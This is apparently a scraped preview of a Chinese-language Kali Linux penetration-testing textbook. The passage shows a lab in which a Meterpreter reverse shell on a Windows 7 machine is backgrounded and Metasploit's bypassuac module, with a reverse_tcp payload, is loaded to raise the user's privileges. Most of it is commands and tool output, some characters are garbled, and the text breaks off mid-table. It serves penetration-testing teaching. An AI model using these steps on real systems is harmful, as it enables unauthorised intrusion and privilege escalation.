MANAGEMENT
Kail Linux汆芵聆彸妗捄忒聊菴侐梒.pdf

Meterpreter shell process 1544 created channel 1

Info icon This preview shows pages 29–31. Sign up to view the full content.

meterpreter > shell Process 1544 created. Channel 1 created. Microsoft Windows [ 6.1.7601] �� Ȩ ���� (c) 2009 Microsoft Corporation ���������� Ȩ C:\Users\bob\Desktop> 输出的信息表示进入了目标系统 Windows 7 的命令行,并且当前目标系统登录的用户 bob 4.4 提升权限 很多情况下渗透攻击成功后,可能目标系统是一个普通用户登录在系统中。此时,所拥 有的权限可能很低。这时候,仍然还是不能进行大部分操作。幸运的是,在 Metasploit 中可 以使用 bypassuac 模块绕过用户访问控制( UAC ),进而提升用户的权限。本节将介绍如何 提升权限。 【实例 4-11 】下面以上例获取到的 Meterpreter Shell 为例,演示提升 bob 用户权限。具 体操作步骤如下所示: 1 )后台运行会话。执行命令如下所示: meterpreter > background [*] Backgrounding session 1... 从输出的信息中,可以看到当前后台运行的会话编号是 1 。该会话编号需要记住,在后 面将会用到。 2 )查看下会话详细信息。执行命令如下所示: msf exploit(handler) > sessions Active sessions =============== Id Type Information Connection -- -------------------------- --------------------------------------------------------------- ------------------------------ 1 meterpreter x86/win32 WIN-RKPKQFBLG6C\bob @ WIN-RKPKQFBLG6C 192.168.6.103:4444 -> 192.168.6.106:49199 (192.168.6.106) 从输出信息中可以看到该会话中,连接到目标系统的运行架构、计算机名及 IP 地址。 3 )使用 bypassuac 模块,并查看可配置的选项参数。执行命令如下所示: msf exploit(handler) > use exploit/windows/local/bypassuac msf exploit(bypassuac) > show options Module options (exploit/windows/local/bypassuac): Name Current Setting Required Description ---- --------------- ------------- --------------------------------------------------- SESSION yes The session to run this module on. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- ------------- ----------------------------------------------------------------------------
Image of page 29

Info icon This preview has intentionally blurred sections. Sign up to view the full version.